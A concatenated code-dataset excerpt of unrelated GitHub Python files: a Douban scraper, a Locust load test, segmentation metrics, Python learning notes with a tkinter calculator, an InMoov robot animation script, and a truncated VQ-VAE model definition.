urllib.request\n\n\ndef create_request(pageNum):\n baseUrl = 'https://movie.douban.com/j/chart/top_list?type=1&interval_id=100%3A90&action='\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',\n }\n data = {\n 'start': (pageNum - 1) * 20,\n 'limit': 20\n }\n data = urllib.parse.urlencode(data)\n url = baseUrl + data\n return urllib.request.Request(url=url, headers=headers)\n\n\ndef get_content(request):\n return urllib.request.urlopen(request).read().decode('utf-8')\n\n\ndef download(pageNum, content):\n with open('resource/douban' + str(pageNum) + '.json', 'w', encoding='utf-8') as f:\n f.write(content)\n\n\nif __name__ == '__main__':\n for pageNum in range(1, 11):\n request = create_request(pageNum)\n content = get_content(request)\n download(pageNum, content)\n","repo_name":"KnIdIShe/someProjects","sub_path":"PythonSpider/062_urllib_ajax_getDoubanMoviePage1-10.py","file_name":"062_urllib_ajax_getDoubanMoviePage1-10.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25868401243","text":"import json\nimport logging\n\nfrom locust import HttpUser, between, events, task\nfrom locust.runners import MasterRunner\nfrom locust.stats import console_logger\nfrom locust_plugins.users import RestUser\n\nfrom sample.database import setup_initial_data, teardown_database\n\n# You can suppress tables in log by disabling stats logger\nconsole_logger.disabled = True\n\nlogger = logging.getLogger(__name__)\n\nwith open(\"users.json\", \"r\") as f:\n USERS = json.load(f)\n\n\n@events.test_start.add_listener\ndef on_test_start(environment, **kwargs):\n if isinstance(environment.runner, MasterRunner):\n logger.info(\"Setting up database...\")\n setup_initial_data()\n logger.info(\"Finished setting up database\")\n else:\n logger.info(\"Starting worker setup\")\n # Do worker node setup\n logger.info(\"Finished worker setup\")\n\n\n@events.test_stop.add_listener\ndef on_test_stop(environment, **kwargs):\n if isinstance(environment.runner, MasterRunner):\n logger.info(\"Tearing down from master\")\n teardown_database()\n logger.info(\"Finished tearing down from master\")\n else:\n logger.info(\"Tearing down from worker\")\n # Do worker node setup\n logger.info(\"Finish tearing down from worker\")\n\n\nclass AuthenticatedUser(HttpUser):\n\n wait_time = between(1, 5)\n\n def on_start(self):\n if len(USERS) > 0:\n user = USERS.pop()\n logger.info(f\"popped user: {user}\")\n self.name = user[\"name\"]\n self.client.post(\n \"/auth\",\n json={\n \"name\": user[\"name\"],\n \"password\": user[\"password\"],\n },\n )\n\n @task\n def get_name(self):\n with self.client.get(\"/\") as resp:\n if resp.json()[\"name\"] != self.name:\n logger.warning(\"not match\")\n resp.failure()\n","repo_name":"TatchNicolas/pyconjp2021-locust","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"35498886287","text":"from torch.functional import Tensor\r\nfrom general_utils import log\r\nfrom collections import defaultdict\r\nimport numpy as np\r\n\r\nimport torch\r\nfrom torch.nn import functional as nnf\r\n\r\n\r\nclass BaseMetric(object):\r\n\r\n def __init__(self, metric_names, pred_range=None, gt_index=0, pred_index=0, eval_intermediate=True,\r\n eval_validation=True):\r\n self._names = tuple(metric_names)\r\n self._eval_intermediate = eval_intermediate\r\n self._eval_validation = eval_validation\r\n\r\n self._pred_range = pred_range\r\n self._pred_index = pred_index\r\n self._gt_index = gt_index\r\n\r\n self.predictions = []\r\n self.ground_truths = []\r\n\r\n def eval_intermediate(self):\r\n return self._eval_intermediate\r\n\r\n def eval_validation(self):\r\n return self._eval_validation\r\n\r\n def names(self):\r\n return self._names\r\n\r\n def add(self, predictions, ground_truth):\r\n raise NotImplementedError\r\n\r\n def value(self):\r\n raise NotImplementedError\r\n\r\n def scores(self):\r\n # similar to value but returns dict\r\n value = self.value()\r\n if type(value) == dict:\r\n return value\r\n else:\r\n assert type(value) in {list, tuple}\r\n return list(zip(self.names(), self.value()))\r\n\r\n def _get_pred_gt(self, predictions, ground_truth):\r\n pred = predictions[self._pred_index]\r\n gt = ground_truth[self._gt_index]\r\n\r\n if self._pred_range is not None:\r\n pred = pred[:, self._pred_range[0]: self._pred_range[1]]\r\n\r\n return pred, gt\r\n\r\n\r\nclass FixedIntervalMetrics(BaseMetric):\r\n\r\n def __init__(self, sigmoid=False, ignore_mask=False, resize_to=None, \r\n resize_pred=None, n_values=51, custom_threshold=None):\r\n\r\n\r\n super().__init__(('ap', 'best_fgiou', 'best_miou', 'fgiou0.5', 'fgiou0.1', 'mean_iou_0p5', 'mean_iou_0p1', 'best_biniou', 'biniou_0.5', 'fgiou_thresh'))\r\n self.intersections = []\r\n self.unions = []\r\n # self.threshold = threshold\r\n self.sigmoid = sigmoid\r\n self.resize_to = resize_to\r\n self.resize_pred = resize_pred # resize prediction to match ground truth\r\n self.class_count = defaultdict(lambda: 0)\r\n self.per_class = defaultdict(lambda : [0,0])\r\n self.ignore_mask = ignore_mask\r\n self.custom_threshold = custom_threshold\r\n\r\n self.scores_ap = []\r\n self.scores_iou = []\r\n self.gts, self.preds = [], []\r\n self.classes = []\r\n\r\n # [1:-1] ignores 0 and 1\r\n self.threshold_values = np.linspace(0, 1, n_values)[1:-1]\r\n\r\n self.metrics = dict(tp=[], fp=[], fn=[], tn=[])\r\n\r\n def add(self, pred, gt):\r\n \r\n pred_batch = pred[0].cpu()\r\n\r\n if self.sigmoid:\r\n pred_batch = torch.sigmoid(pred_batch)\r\n\r\n gt_batch = gt[0].cpu()\r\n mask_batch = gt[1] if len(gt) > 1 and not self.ignore_mask and gt[1].numel() > 0 else ([None] * len(pred_batch))\r\n cls_batch = gt[2] if len(gt) > 2 else [None] * len(pred_batch)\r\n\r\n if self.resize_to is not None:\r\n gt_batch = nnf.interpolate(gt_batch, self.resize_to, mode='nearest')\r\n pred_batch = nnf.interpolate(pred_batch, self.resize_to, mode='bilinear', align_corners=False)\r\n \r\n if isinstance(cls_batch, torch.Tensor):\r\n cls_batch = cls_batch.cpu().numpy().tolist()\r\n\r\n assert len(gt_batch) == len(pred_batch) == len(cls_batch), f'{len(gt_batch)} {len(pred_batch)} {len(cls_batch)}'\r\n\r\n for predictions, ground_truth, mask, cls in zip(pred_batch, gt_batch, mask_batch, cls_batch):\r\n\r\n if self.resize_pred:\r\n predictions = nnf.interpolate(predictions.unsqueeze(0).float(), size=ground_truth.size()[-2:], mode='bilinear', align_corners=True)\r\n\r\n p = predictions.flatten()\r\n g = ground_truth.flatten()\r\n\r\n assert len(p) == len(g)\r\n\r\n if mask is not None:\r\n m = mask.flatten().bool()\r\n p = p[m]\r\n g = g[m]\r\n\r\n p_sorted = p.sort()\r\n p = p_sorted.values\r\n g = g[p_sorted.indices]\r\n\r\n tps, fps, fns, tns = [], [], [], []\r\n for thresh in self.threshold_values:\r\n\r\n valid = torch.where(p > thresh)[0]\r\n if len(valid) > 0:\r\n n = int(valid[0])\r\n else:\r\n n = len(g)\r\n\r\n fn = int(g[:n].sum())\r\n tp = int(g[n:].sum())\r\n fns += [fn]\r\n tns += [n - fn]\r\n tps += [tp]\r\n fps += [len(g) - n - tp]\r\n\r\n self.metrics['tp'] += [tps]\r\n self.metrics['fp'] += [fps]\r\n self.metrics['fn'] += [fns]\r\n self.metrics['tn'] += [tns]\r\n\r\n self.classes += [cls.item() if isinstance(cls, torch.Tensor) else cls]\r\n\r\n def value(self):\r\n\r\n import time\r\n t_start = time.time() \r\n\r\n if set(self.classes) == set([None]):\r\n all_classes = None\r\n log.warning('classes were not provided, cannot compute mIoU')\r\n else:\r\n all_classes = set(int(c) for c in self.classes)\r\n # log.info(f'compute metrics for {len(all_classes)} classes')\r\n\r\n summed = {k: [sum([self.metrics[k][i][j] \r\n for i in range(len(self.metrics[k]))])\r\n for j in range(len(self.threshold_values))]\r\n for k in self.metrics.keys()}\r\n\r\n if all_classes is not None:\r\n\r\n assert len(self.classes) == len(self.metrics['tp']) == len(self.metrics['fn'])\r\n # group by class\r\n metrics_by_class = {c: {k: [] for k in self.metrics.keys()} for c in all_classes}\r\n for i in range(len(self.metrics['tp'])):\r\n for k in self.metrics.keys():\r\n metrics_by_class[self.classes[i]][k] += [self.metrics[k][i]]\r\n \r\n # sum over all instances within the classes\r\n summed_by_cls = {k: {c: np.array(metrics_by_class[c][k]).sum(0).tolist() for c in all_classes} for k in self.metrics.keys()}\r\n\r\n\r\n # Compute average precision\r\n\r\n assert (np.array(summed['fp']) + np.array(summed['tp']) ).sum(), 'no predictions is made'\r\n\r\n # only consider values where a prediction is made\r\n precisions = [summed['tp'][j] / (1 + summed['tp'][j] + summed['fp'][j]) for j in range(len(self.threshold_values))\r\n if summed['tp'][j] + summed['fp'][j] > 0]\r\n recalls = [summed['tp'][j] / (1 + summed['tp'][j] + summed['fn'][j]) for j in range(len(self.threshold_values))\r\n if summed['tp'][j] + summed['fp'][j] > 0]\r\n\r\n # remove duplicate recall-precision-pairs (and sort by recall value)\r\n recalls, precisions = zip(*sorted(list(set(zip(recalls, precisions))), key=lambda x: x[0]))\r\n\r\n from scipy.integrate import simps\r\n ap = simps(precisions, recalls)\r\n\r\n # Compute best IoU\r\n fgiou_scores = [summed['tp'][j] / (1 + summed['tp'][j] + summed['fp'][j] + summed['fn'][j]) for j in range(len(self.threshold_values))]\r\n\r\n biniou_scores = [\r\n 0.5*(summed['tp'][j] / (1 + summed['tp'][j] + summed['fp'][j] + summed['fn'][j])) + \r\n 0.5*(summed['tn'][j] / (1 + summed['tn'][j] + summed['fn'][j] + summed['fp'][j])) \r\n for j in range(len(self.threshold_values))\r\n ]\r\n \r\n index_0p5 = self.threshold_values.tolist().index(0.5)\r\n index_0p1 = self.threshold_values.tolist().index(0.1)\r\n index_0p2 = self.threshold_values.tolist().index(0.2)\r\n index_0p3 = self.threshold_values.tolist().index(0.3)\r\n\r\n if self.custom_threshold is not None:\r\n index_ct = self.threshold_values.tolist().index(self.custom_threshold)\r\n\r\n if all_classes is not None:\r\n # mean IoU\r\n mean_ious = [np.mean([summed_by_cls['tp'][c][j] / (1 + summed_by_cls['tp'][c][j] + summed_by_cls['fp'][c][j] + summed_by_cls['fn'][c][j]) \r\n for c in all_classes])\r\n for j in range(len(self.threshold_values))]\r\n\r\n mean_iou_dict = {\r\n 'miou_best': max(mean_ious) if all_classes is not None else None,\r\n 'miou_0.5': mean_ious[index_0p5] if all_classes is not None else None,\r\n 'miou_0.1': mean_ious[index_0p1] if all_classes is not None else None,\r\n 'miou_0.2': mean_ious[index_0p2] if all_classes is not None else None,\r\n 'miou_0.3': mean_ious[index_0p3] if all_classes is not None else None,\r\n 'miou_best_t': self.threshold_values[np.argmax(mean_ious)],\r\n 'mean_iou_ct': mean_ious[index_ct] if all_classes is not None and self.custom_threshold is not None else None,\r\n 'mean_iou_scores': mean_ious,\r\n }\r\n\r\n print(f'metric computation on {(len(all_classes) if all_classes is not None else \"no\")} classes took {time.time() - t_start:.1f}s')\r\n\r\n return {\r\n 'ap': ap,\r\n\r\n # fgiou\r\n 'fgiou_best': max(fgiou_scores),\r\n 'fgiou_0.5': fgiou_scores[index_0p5],\r\n 'fgiou_0.1': fgiou_scores[index_0p1],\r\n 'fgiou_0.2': fgiou_scores[index_0p2],\r\n 'fgiou_0.3': fgiou_scores[index_0p3],\r\n 'fgiou_best_t': self.threshold_values[np.argmax(fgiou_scores)],\r\n\r\n # mean iou\r\n\r\n\r\n # biniou\r\n 'biniou_best': max(biniou_scores),\r\n 'biniou_0.5': biniou_scores[index_0p5],\r\n 'biniou_0.1': biniou_scores[index_0p1],\r\n 'biniou_0.2': biniou_scores[index_0p2],\r\n 'biniou_0.3': biniou_scores[index_0p3],\r\n 'biniou_best_t': self.threshold_values[np.argmax(biniou_scores)],\r\n\r\n # custom threshold\r\n 'fgiou_ct': fgiou_scores[index_ct] if self.custom_threshold is not None else None,\r\n 'biniou_ct': biniou_scores[index_ct] if self.custom_threshold is not None else None,\r\n 'ct': self.custom_threshold,\r\n\r\n # statistics\r\n 'fgiou_scores': fgiou_scores,\r\n 'biniou_scores': biniou_scores,\r\n 'precision_recall_curve': sorted(list(set(zip(recalls, precisions)))),\r\n 'summed_statistics': summed,\r\n 'summed_by_cls_statistics': summed_by_cls,\r\n\r\n **mean_iou_dict\r\n }\r\n\r\n # ('ap', 'best_fgiou', 'best_miou', 'fgiou0.5', 'fgiou0.1', 'mean_iou_0p5', 'mean_iou_0p1', 'best_biniou', 'biniou_0.5', 'fgiou_thresh'\r\n\r\n # return ap, best_fgiou, best_mean_iou, iou_0p5, iou_0p1, mean_iou_0p5, mean_iou_0p1, best_biniou, biniou0p5, best_fgiou_thresh, {'summed': summed, 'summed_by_cls': summed_by_cls}\r\n\r\n","repo_name":"deforum-art/sd-webui-deforum","sub_path":"scripts/deforum_helpers/src/clipseg/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":10877,"program_lang":"python","lang":"en","doc_type":"code","stars":2274,"dataset":"github-code","pt":"16"} +{"seq_id":"24245779784","text":"#num1 = int(input(\"Type num1: \"))\n#num2 = int(input(\"Type num2: \"))\n\n#num3 = num1 * num2\n#print(num3)\n\n#def Hello():\n# print(\"Nampc\")\n# print(\"1618\")\n#Hello()\n\n#def Main():\n# print(\"Started\")\n# output = getInteger()\n# print(\"Number entered is: \",output)\n \n#def getInteger():\n# result = int(input(\"Enter integer: \"))\n# return result\n\n#if(__name__==\"__main__\"):\n# Main()\n\n#def CountNum():\n# for num in range(10):\n# if(num > 5 or num < 2):\n# print(num)\n \n#def mainTest():\n# CountNum()\n\n#if(__name__==\"__main__\"):\n# mainTest()\n\n\n#import math\n\n#def Main():\n# num = -85\n # fabs is used to get the absolute\n # value of a decimal\n# num = math.fabs(num)\n# print(num)\n \n#if __name__ == \"__main__\":\n# Main()\n\n# Python program to illustrate a list\n\n# create a empty list\n#nums = []\n# appending data in list\n#nums.append(1.618)\n#nums.append(\"Nampc\")\n#nums.append(\"dz\")\n#nums.append(22)\n\n#print(nums)\n\n# create a empty dict\n#Dict = []\n\n# putting integer values\n#Dict = {1: 'Vietnames', 2: 'English', 3: 'Catonese'}\n#print(Dict[1])\n\n#tup = ('Vietnamese', 22, \"Chinese\", 1.618)\n#print(tup[3])\n\n# import keyword as kw\n\n# print(\"The list of keywords is: \")\n# print(kw.kwlist)\n\n# print(False == 0)\n# print(True == 1)\n\n# print(True + True + True)\n# print(True + False + False)\n\n# print(None == 0)\n# print(None == [])\n\n# print(True or False) # Return True\n\n# print(False and True) # Return False\n\n# print(not True) # Return False\n\n# # Using \"in\" to check\n# if 's' in 'Nampcs':\n# print(\"s is part of Nampcs\")\n# else:\n# print(\"s is not part of Nampcs\")\n\n# # Using \"in\" to loop through\n# for i in 'Nampcs1.618':\n# print(i, end=\";\")\n\n# print(\"\\r\")\n\n# # using is to check object identify\n# # string is immutable(cannot be changed once allocated)\n# # hence occupy same memory location\n# print(' ' is ' ')\n\n# # using is to check object identify\n# # dictionary is mutable(can be changed once allocated)\n# # hence occupy different memory location\n# print({} is {})\n\n# for i in range(10):\n# print(i, end=\" \")\n# if i == 6:\n# break\n# print()\n# i = 0\n# while i < 10:\n# if i == 6:\n# i += 1\n# continue\n# else:\n# print(i,end=\" \")\n# i += 1\n# print()\n# j = 20\n# if j == 10:\n# print(\"j is 10\")\n# elif i == 20:\n# print(\"j is 20\")\n# else:\n# print(\"j is not present\")\n\n# Return keyword\n# def fun():\n# S = 0\n \n# for i in range(10):\n# S += i\n# return S\n# print(fun())\n\n# Yield keyword\n# def fun():\n# S = 0\n \n# for i in range(10):\n# S += i\n# yield S\n# for i in fun():\n# print(i)\n\n# class Keyword\n# class Dog:\n# attr1 = \"mammal\"\n# attr2 = \"dog\"\n \n# def fun(self):\n# print(\"I'm a\", self.attr1)\n# print(\"I'm a\", self.attr2)\n# Rodger = Dog()\n\n# print(Rodger.attr1)\n# Rodger.fun()\n\n# class Student:\n# def __init__(self, id, name, age):\n# self.id = id\n# self.name = name\n# self.age = age\n# def __str__(self):\n# return f\"[{self.id}] - {self.name} ({self.age} age)\"\n# def __sizeof__(self):\n# return 100\n# def myFunc(self):\n# print(\"Hello my name is \"+self.name)\n \n# student1 = Student(1618, \"Nampc\", 30)\n# student1.id = 1\n# student1.name = \"Nampcs\"\n# print(student1)\n# print(student1.__sizeof__())\n# print(student1.myFunc())\n\n# using with statement\n# file_path = \".\\\\test.txt\"\n# with open(file_path, 'w') as file:\n# file.write(\"Nampc\")\n\n# import math as gfg\n\n# print(gfg.factorial(5))\n\n# n = 10\n# for i in range(n):\n# # do something\n# pass\n\n# ld = lambda x: x*x*x\n# ld2 = lambda y:(y + 20) * 10\n# print(ld(10))\n# print(ld2(12))\n\n# import math\n# print(math.factorial(10))\n\n# from math import factorial\n# print(factorial(20))\n\n# a = 4\n# b = 0\n\n# try:\n# k = a//b # raise divide by zero exception\n# print(k)\n# except ZeroDivisionError:\n# print(\"Can't divide by zero\")\n# finally:\n# print(\"This is always executed\")\n\n# print(\"The value of a / b is: \")\n# assert b != 0, \"Divide by 0 error\"\n# print(a/b)\n\n# var1 = 20\n# var2 = \"Nampc\"\n\n# print(var1)\n# print(var2)\n\n# del var1\n# del var2\n\n# print(var1)\n# print(var2)\n\n\n# a = 15 # global varibale\n# b = 10 # global variable\n\n# def add():\n# c = a + b\n# print(c)\n# add()\n\n# def fun():\n# var1 = 10\n# def gun():\n# nonlocal var1\n# var1 = var1 + 10\n# print(var1)\n# print(var1)\n# gun()\n# fun()\n\n# import keyword\n\n# keys = [\"for\", \"while\", \"Nampc\", \"break\", \"elif\", \"assert\", \"Catonese\", \"lambda\", \"None\", \"and\", \"global\"\n# ,\"finally\", \"nonlocal\", \"pass\", \"continue\", \"HappyNewYear\"]\n\n# for i in range(len(keys)):\n# # checking which are keywords\n# if keyword.iskeyword(keys[i]):\n# print(keys[i] + \" is python keyword\")\n# else:\n# print(keys[i] + \" is not python keyword\")\n\n# print(keyword.kwlist)\n# print(keyword.kwlist.__len__())\n\n# import sys\n\n# sys.stdout.write(\"Nampcs \")\n# sys.stdout.write(\"is the best company about technology in North Vietnam \")\n\n# lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n# print(*lst)\n\n# print(\"Nampc\",end=\" \")\n# print(\"NampcNampcs\")\n\n# arr = [1, 2, 3, 4, 5]\n# for i in range(5):\n# print(arr[i], end=\" \")\n\n# ----------------- CALCULATOR --------------------\nimport tkinter as tk\nimport tkinter.messagebox\nfrom tkinter.constants import SUNKEN\n\nwindow = tk.Tk()\nwindow.title(\"Calculator-Nampc\")\nframe = tk.Frame(master=window, bg=\"skyblue\", padx=10)\nframe.pack()\nentry = tk.Entry(master=frame, relief=SUNKEN, borderwidth=3, width=30)\nentry.grid(row=0,column=0, columnspan=3, ipady=2, pady=2)\n\ndef myClick(number):\n entry.insert(tk.END, number)\n \ndef equal():\n try:\n y = str(eval(entry.get()))\n entry.delete(0, tk.END)\n entry.insert(0, y)\n except:\n tkinter.messagebox.showerror(\"Error\", \"Syntax Error\")\ndef clear():\n entry.delete(0, tk.END)\n\nbutton_1 = tk.Button(master=frame, text='1', padx=15,\n pady=5, width=3, command=lambda: myClick(1))\nbutton_1.grid(row=1, column=0, pady=2)\nbutton_2 = tk.Button(master=frame, text='2', padx=15,\n pady=5, width=3, command=lambda: myClick(2))\nbutton_2.grid(row=1, column=1, pady=2)\nbutton_3 = tk.Button(master=frame, text='3', padx=15,\n pady=5, width=3, command=lambda: myClick(3))\nbutton_3.grid(row=1, column=2, pady=2)\nbutton_4 = tk.Button(master=frame, text='4', padx=15,\n pady=5, width=3, command=lambda: myClick(4))\nbutton_4.grid(row=2, column=0, pady=2)\nbutton_5 = tk.Button(master=frame, text='5', padx=15,\n pady=5, width=3, command=lambda: myClick(5))\nbutton_5.grid(row=2, column=1, pady=2)\nbutton_6 = tk.Button(master=frame, text='6', padx=15,\n pady=5, width=3, command=lambda: myClick(6))\nbutton_6.grid(row=2, column=2, pady=2)\nbutton_7 = tk.Button(master=frame, text='7', padx=15,\n pady=5, width=3, command=lambda: myClick(7))\nbutton_7.grid(row=3, column=0, pady=2)\nbutton_8 = tk.Button(master=frame, text='8', padx=15,\n pady=5, width=3, command=lambda: myClick(8))\nbutton_8.grid(row=3, column=1, pady=2)\nbutton_9 = tk.Button(master=frame, text='9', padx=15,\n pady=5, width=3, command=lambda: myClick(9))\nbutton_9.grid(row=3, column=2, pady=2)\nbutton_0 = tk.Button(master=frame, text='0', padx=15,\n pady=5, width=3, command=lambda: myClick(0))\nbutton_0.grid(row=4, column=1, pady=2)\n \nbutton_add = tk.Button(master=frame, text=\"+\", padx=15,\n pady=5, width=3, command=lambda: myClick('+'))\nbutton_add.grid(row=5, column=0, pady=2)\n \nbutton_subtract = tk.Button(\n master=frame, text=\"-\", padx=15, pady=5, width=3, command=lambda: myClick('-'))\nbutton_subtract.grid(row=5, column=1, pady=2)\n \nbutton_multiply = tk.Button(\n master=frame, text=\"*\", padx=15, pady=5, width=3, command=lambda: myClick('*'))\nbutton_multiply.grid(row=5, column=2, pady=2)\n \nbutton_div = tk.Button(master=frame, text=\"/\", padx=15,\n pady=5, width=3, command=lambda: myClick('/'))\nbutton_div.grid(row=6, column=0, pady=2)\n \nbutton_clear = tk.Button(master=frame, text=\"clear\",\n padx=15, pady=5, width=12, command=clear)\nbutton_clear.grid(row=6, column=1, columnspan=2, pady=2)\n \nbutton_equal = tk.Button(master=frame, text=\"=\", padx=15,\n pady=5, width=9, command=equal)\nbutton_equal.grid(row=7, column=0, columnspan=3, pady=2)\n\nwindow.mainloop()","repo_name":"nampc1618/Summary_Python","sub_path":"Learn_Py.py","file_name":"Learn_Py.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1218535226","text":"from matplotlib import pyplot as plt \nimport numpy as np\nfrom scipy.special import pbwa\n\ndef U(a,x):\n return pbwa(a,x)[0]\n\nT = np.linspace(5e-2,3,num=300)\nJ_lin = 1/(np.sqrt(T*np.pi))\nJ_sph = (1+np.sqrt(T*np.pi))/(np.sqrt(T*np.pi))\nJ_band = (np.pi*T)**(-0.5) + 1.0 - ((2.0**0.75)/np.pi)*(T**0.75)*np.exp(-1.0/(8.0*T)) * (U(2.0,(2.0*T)**(-0.5)))\nplt.plot(T,J_lin,label='Linear')\nplt.plot(T,J_sph,label='spherical')\nplt.plot(T,J_band,label='Band electrode')\nplt.legend()\n\nplt.show()\n\n","repo_name":"nmerovingian/PINN-Voltammetry-Best-Practices","sub_path":"Chronoamperometry at a Microband Electrode/microband analytical.py","file_name":"microband analytical.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"36266281414","text":"\nimport time\nfrom os.path import join, dirname\nimport sys\nwhereami = dirname(__file__)\nscripts_dir= join(whereami, \"../scripts/\")\nsys.path.append(scripts_dir)\nfrom json_parsing import read_json\nimport Inmoov\n\nfilename_pose = join(whereami, '../json/pose.json')\nfilename_animation = join(whereami, '../json/animations.json')\n\n# global objects that hold the json file contents\n# so i can control when/how often to read the json file\n# in the inmoov object, when it receives messages, it only needs to update at bootup. json will not change after bootup.\n# in the gui, it should update each time it tries to run, because the gui is editing the files.\nglobal_poses = None\nglobal_animations = None\n\ndef update_animations():\n global global_animations\n global_animations = read_json(filename_animation)\ndef update_poses():\n global global_poses\n global_poses = read_json(filename_pose)\n\n\n# TODO: if we are keeping the killlist idea, make it cleaner & easy to remove when transferring to a robot that doesn't need it\n# TODO: be more intelligent about when we need to read the animation/pose json files\n\n\ndef do_animation(the_inmoov, animation_name):\n update_animations()\n print(\"Executing animation \", str(animation_name))\n\n if animation_name not in global_animations:\n print(\"FAIL TO FIND: ANIMATION '%s'\" % str(animation_name))\n return\n\n #for key, pose_info in sorted(animation_data[animation_name].items()):\n # this method better supports animations >= 10 frames long\n # because using sorted() on 1-12 returns [1, 10, 11, 12, 2, 3, 4, 5, etc]\n this_animation_dict = global_animations[animation_name]\n t = 1\n while str(t) in this_animation_dict:\n # pose_info is a list with item0 = posename and item1 = holdtime\n pose_info = this_animation_dict[str(t)]\n print(\"\\n********* Executing pose {} *********\\n\".format(str(pose_info[0])))\n do_pose(the_inmoov, pose_info[0], pose_info[1])\n t += 1\n print(\"\\nANIMATION COMPLETE!\\n\")\n\n#killtime = 1\nkilllist = [\"left_shoulder_lift_front\",\"left_arm_rotate\",\"right_arm_rotate\",\"right_shoulder_lift_front\"]\n\ndef do_pose(the_inmoov, pose_name, hold_time=0):\n killtime = 1\n update_poses()\n if pose_name not in global_poses:\n print(\"FAIL TO FIND: POSE '%s'\" % str(pose_name))\n return\n hold_time = float(hold_time)\n pose_data = global_poses[pose_name]\n for servo_name, servo_angle in pose_data.items():\n #Obtain a handle to the actual servo object\n fservo = the_inmoov.find_servo_by_name(str(servo_name))\n if fservo.curr_angle == servo_angle:\n # if telling it to move to a position it's already at, skip it instead, it doesnt need to move\n print('Skipping', servo_name)\n else:\n fservo.rotate(float(servo_angle))\n print('Setting {} servo to an angle of {}'.format(servo_name, servo_angle))\n# if servo_name == 'right_lift_front':\n# killtime = abs((7.5/90)*(fservo.curr_angle - servo_angle))\n if hold_time != 0:\n print('\\n--------------- Hold for {} second(s) ---------------'.format(hold_time))\n\n# # todo: handle corner case where hold_time < killtime\n# time.sleep(killtime)\n# # kill all servos that can safely hold position wihtout power\n# for killname in killlist:\n# fservo = this_inmoov.find_servo_by_name(str(killname))\n# fservo.off()\n# time.sleep(hold_time - killtime)\n time.sleep(hold_time)\n \n\nif __name__ == '__main__':\n this_inmoov = Inmoov.Inmoov()\n \n do_animation(this_inmoov, 'rps_paper')\n time.sleep(5)\n exit()\n do_animation(this_inmoov, 'headright_anim')\n time.sleep(5)\n do_animation(this_inmoov, 'headleft_anim')\n time.sleep(5)\n do_animation(this_inmoov, 'headright_anim')\n time.sleep(5)\n","repo_name":"mish3albaiz/Robotics_ECE579","sub_path":"inmoov/scripts/animation_executor.py","file_name":"animation_executor.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29352650732","text":"import sys\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport librosa\nimport math\n\nsys.path.append('../wavenet')\nfrom wavenet.model import WaveNetModel\nfrom utils import inv_mu_law_numpy, mu_law_numpy\nfrom wavenet.ops import mu_law_encode as mu_law\n\n\ndef create_variable(name, shape):\n '''Create a convolution filter variable with the specified name and shape,\n and initialize it using Xavier initialition.'''\n initializer = tf.contrib.layers.xavier_initializer()\n variable = tf.get_variable(name, shape, initializer=initializer)\n return variable\n\ndef create_bias_variable(name, shape):\n '''Create a bias variable with the specified name and shape and initialize\n it to zero.'''\n initializer = tf.constant_initializer(value=0.0, dtype=tf.float32)\n variable = tf.get_variable(name, shape, initializer=initializer)\n return variable\n\ndef create_embedding_table(name, shape):\n if shape[0] == shape[1]:\n # Make a one-hot encoding as the initial value.\n initial_val = np.identity(n=shape[0], dtype=np.float32)\n variable = tf.get_variable(name, initializer=initial_val)\n return variable\n else:\n return create_variable(name, shape)\n\ndef get_bilinear_filter(filter_shape, upscale_factor, name=None):\n ##filter_shape is [width, height, num_in_channels, num_out_channels]\n kernel_size = filter_shape[0]\n ### Centre location of the filter for which value is calculated\n if kernel_size % 2 == 1:\n centre_location = upscale_factor - 1\n else:\n centre_location = upscale_factor - 0.5\n\n bilinear = np.zeros([filter_shape[0], filter_shape[1]])\n for x in range(filter_shape[0]):\n for y in range(filter_shape[1]):\n ##Interpolation Calculation\n value = (1 - abs((x - centre_location)/ upscale_factor)) * (1 - abs((y - centre_location)/ upscale_factor))\n bilinear[x, y] = value\n\n weights = np.zeros(filter_shape)\n for i in range(filter_shape[2]):\n for j in range(filter_shape[3]):\n weights[:, :, i, j] = bilinear\n init = tf.constant_initializer(value=weights,\n dtype=tf.float32)\n\n bilinear_weights = tf.get_variable(name=name, initializer=init,\n shape=weights.shape)\n return bilinear_weights \n \nclass VQVAE:\n def __init__(self,\n batch_size=None, sample_size=None, q_factor=1, n_stack=2, max_dilation=10, K=512, D=128,\n lr=0.001, use_gc=False, gc_cardinality=None, is_training=True, global_step=None,\n scope='params', residual_channels=256, dilation_channels=512, skip_channels=256, use_biases=False,\n upsampling_method='deconv', encoding_channels=[2, 4, 8, 16, 32, 1]):\n\n assert sample_size is not None\n assert q_factor == 1 or (q_factor % 2) == 0\n\n self.filter_width = 2\n self.dilations = [2 ** i for j in range(n_stack) for i in range(max_dilation)]\n self.receptive_field = (self.filter_width - 1) * sum(self.dilations) + 1\n self.receptive_field += self.filter_width - 1\n\n self.q_factor = q_factor\n self.quantization_channels = 256 * q_factor\n\n self.K = K\n self.D = D \n self.use_gc = use_gc\n self.gc_cardinality = gc_cardinality\n self.use_biases = use_biases\n\n # encoding spec\n self.encode_level = 6\n self.encoding_channels = encoding_channels\n\n # model spec\n self.upsampling_method = upsampling_method\n self.is_training = is_training\n self.train_op = None\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.reduced_timestep = None\n self.initialized = False\n if batch_size is not None and sample_size is not None:\n self.reduced_timestep = int(np.ceil(self.sample_size / 2 ** self.encode_level))\n self.initialized = True\n\n # etc\n self.drop_rate = 0.5\n self.global_step = global_step\n self.lr = lr\n\n \n with tf.variable_scope(scope) as params:\n self.enc_var, self.enc_scope = self.create_encoder_variables()\n with tf.variable_scope('decoder') as dec_param_scope:\n \n self.deconv_var = self.create_deconv_variables()\n self.wavenet = 